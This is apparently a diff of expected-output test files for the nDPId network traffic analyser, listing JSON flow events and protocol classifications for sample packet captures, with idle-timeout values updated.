00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}}
00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Media"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"}}
00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -675,8 +675,8 @@
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}

8
test/results/443-chrome.pcap.out
View File

@@ -1,9 +1,9 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-chrome.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109434258}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1581109434258,"pkt":"KDc3AG3IEBMx8Tl2CABFAAXUL9xAADQG19GyPsWCwKgBDQG7z0OMwKr+Oj0RjoAQAfVXrQAAAQEICiUvy0seKwePAbBkhQkGDSwXAwMFJB7ULkZYT314CXk9r8PlYJygP344H6B+ItT1QydBOUTT\/6D31GPVzKtOQjSVxhbT8njy8fnLCF03csGz4\/Y1RkgUVmI84ERVBP7zbdzqFVMxHmkRU4146\/GYpGt09JudxRaBFBE6RH99GaIPOIBgIxL+lVzyEaqTle8b2ooKlmYXANwIghY6MzW7vfR0m2NAd4\/mImO8\/LyUCeGK0r\/puyNRW7lwQQMAmHKJdbXl9VyEWyHoVGg2V7UztPOOS9FaOf7PI0qXcHmQjpNhC3tUdKXBoA5lr9L4gV9TtzI0jsGqvB9N6GFz+qcMvQNu9oMflyIYBhNXeC+wMS3iHkbmb6YjZ1BITgZEep9Fizk45i3xCMymSmOsda0ujEX4jtgvxVvAdOobavQSODmvW7nF0r5t9e88tMuzTz7+vTqoOaJn4Q5qSGioRtcVHnLq2LNPOuGgbZaLvf8nOa3F\/fTzsfVgOnrof2PK7x6zJRR4iLtFUyiyV0abVTIHELfIYnSCf71pFYSlMWF1kbosbMAxw+8gDHb28maLs7wPXvpNMwUQmC5zWPLwG8e+Pf\/3nur0wrn5EOul2L1tr2PBCGM7nQJnzz+Ftab4qAnCKKMUrufRAVhXA6Ue6CMSRLYliOxzGRgmHVxorbbpx87m7XMCx1xGrv\/+sMpgjOYFPN80vjeb9Ar4xkocVQgWuuKpaWdNDznMzFzG0+H1ekKy8mE\/Y4uj8aty0rTxx\/RK0gYF2CUtsmGNskEzCWUbq5MAqcp05SHkAJHGGJeLVJYaWPvGXbFa5QHn9poomy6DBa+Zu\/J+olJwYCoT+frN77wk+XmgZEGX8LeovmjP4s1R+UbEFUsUMksh6m15XB\/oDSc43HBC0ZN2fBl+EVSpfPjbG\/eOyIfLCt5fbBfnhNgvommX5LE+2Hk1er+ly1V3Bk3SksoPHjYC3atFWwOW8i0ksy3cnSr3r7urFNldk3MU3+jnEXfTimw+aCW1vRMowhmfm8PlgjcufRfy+KbXvWvcglQ5SIZzkHbMTgRIVTH0rnzAvQa5V3qwPK10Uoz7qDIouhn\/mb\/ZISHF6mBR\/IXvmgdDxCQjDF0pzdpHGlijQnscX9IYmuALydf\/N95pDI1Ksot3SwlV+ToeoAcOu03ffeX9ZWtpGReoSSLBreVK2S9eOKb7ts0O5zIIo7KsqQiv\/vBgScz8WXOWpxQ\/yJVR5ay52w6EYcainLIU7Xbc\/tjzrhulig3U\/8LJroIUx7FTN+1M\/XXQgxU1xPwXfZVd2BCyLjPf3LnCxXwnRvsKpAN+jMhuodhLSF7CgHqc20YiiLhRoKoX9HTNFjjp4NCVuyybqoR14grCEsHZOU2qhA+8BZe5VlL7unSunUXcr1PeN9gM5Jq4MVqPdpyzDhvJpSxU3Hx+L1u56H6J0VrRo\/R6fO225uB9ZADFU\/E9+rLvS3XjVihQI4Xj3oV8Yz2DHOUB7myCSIfri88nrYevcoAQbwAgIH3ZuvMVV+F7spgWZOgjijLQs9AFYfhIg77XK7GhiJW4kT1GNIqN\/59u+gIdPmDuGurVucPbruilLRCDIsr+53Us+irmCwo\/E2YPbk4a0f3NX0k+rNo92g1D9wTfG3QFRXLoBVDcr2q9BeW0PVJsavNUQM+jFbQkjfp93AvyPnmEBcWXIT002jYiClr1Y1\/emkCZ90t5YN1lLX5fUvWWgwvQ8NqFZ2zWMZciPkbKDA3g3Y+AskVzW3FFBLqR77\/aXs+9FwMDBSQUQnjU3ptBoEOyx5s5g6C1C+gxkfWLgzLDV66R77tBk395nAfOwKbaxf02lWN9Kl7ER9qk1HP5doNJPo83hbomHGy3aIU4qtqfnGI\/DWje6wuZoh6zDMTlo3NI6IL\/slMBsWm6kBIHkYOp"}
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109434258,"flow_last_seen":1581109434258,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1581109434258,"l3_proto":"ip4","src_ip":"178.62.197.130","dst_ip":"192.168.1.13","src_port":443,"dst_port":53059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
